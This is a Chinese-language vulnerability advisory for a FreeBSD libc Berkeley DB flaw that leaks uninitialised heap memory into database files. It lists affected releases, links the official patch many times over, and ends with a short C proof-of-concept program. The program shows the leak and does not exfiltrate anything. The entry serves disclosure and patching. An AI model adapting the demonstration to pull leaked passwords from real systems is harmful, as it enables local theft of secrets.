RootSSV:5093FreeBSD libc Berkley DB接口未初始化内存本地信息泄漏漏洞
BUGTRAQ ID: 34666
CNCAN ID:CNCAN-2009042302
FreeBSD是一款开放源代码的BSD操作系统。
FreeBSD libc Berkeley DB接口写malloc(3)中获得的未初始化内存到数据库文件,本地攻击者可以利用漏洞获得敏感信息。
FreeBSD FreeBSD 7.1-STABLE
FreeBSD FreeBSD 7.1-RELEASE-p4
FreeBSD FreeBSD 7.1 -RELEASE-p2
FreeBSD FreeBSD 7.1 -RELEASE-p1
FreeBSD FreeBSD 7.1 -PRE-RELEASE
FreeBSD FreeBSD 7.0-STABLE
FreeBSD FreeBSD 7.0-RELEASE-p8
FreeBSD FreeBSD 7.0-RELEASE-p11
FreeBSD FreeBSD 7.0-RELEASE-p11
FreeBSD FreeBSD 7.0-RELEASE
FreeBSD FreeBSD 7.0 BETA4
FreeBSD FreeBSD 7.0 -RELENG
FreeBSD FreeBSD 7.0 -RELEASE-p9
FreeBSD FreeBSD 7.0 -PRERELEASE
FreeBSD FreeBSD 7.0
FreeBSD FreeBSD 6.4-RELEASE-p2
FreeBSD FreeBSD 6.4 -RELEASE-p3
FreeBSD FreeBSD 6.4 -RELEASE
FreeBSD FreeBSD 6.3 -RELENG
FreeBSD FreeBSD 6.3 -RELEASE-p9
FreeBSD FreeBSD 6.3 -RELEASE-p8
FreeBSD FreeBSD 6.3 -RELEASE-p6
FreeBSD FreeBSD 6.3
可参考如下补丁信息:
FreeBSD FreeBSD 7.0-RELEASE-p8
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.1 -PRE-RELEASE
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 6.3
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 6.3 -RELEASE-p6
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.0 BETA4
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.0-STABLE
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 6.3 -RELEASE-p8
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.0 -RELEASE-p9
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 6.4 -RELEASE-p3
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.1-STABLE
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 6.4 -RELEASE
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 6.4-RELEASE-p2
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 6.3 -RELENG
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.1-RELEASE-p4
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.0-RELEASE
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.0
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.0 -PRERELEASE
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.0-RELEASE-p11
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.1 -RELEASE-p1
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 6.3 -RELEASE-p9
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.1 -RELEASE-p2
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.0-RELEASE-p11
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
FreeBSD FreeBSD 7.0 -RELENG
FreeBSD libc.patch
<a href=“http://security.freebsd.org/patches/SA-09:07/libc.patch” target=“_blank”>http://security.freebsd.org/patches/SA-09:07/libc.patch</a>
可使用如下程序测试:
#include <sys/types.h>
#include <db.h>
#include <err.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int
main()
{
const char data[] = "abcd";
DB *db;
DBT dbt;
/*
* Set _malloc_options to "J" so that all memory obtained from
* malloc(3) is iniatialized to 0x5a. See malloc(3) manual page
* for additional information.
*/
_malloc_options = "J";
db = dbopen("test.db", O_RDWR | O_CREAT | O_TRUNC, 0644, DB_HASH, NULL);
if (db == NULL)
err(1, "dbopen()");
dbt.data = &data;
dbt.size = sizeof(data);
if (db->put(db, &dbt, &dbt, 0) != 0)
err(1, "db->put()");
db->close(db);
return (0);
}
运行程序,可以看到test.db中包含来自malloc(3)中的0xa5字节。PR 123529
(http://www.freebsd.org/cgi/query-pr.cgi?pr=123529)报告中证实了一个实际例子,导致敏感密码信息泄漏。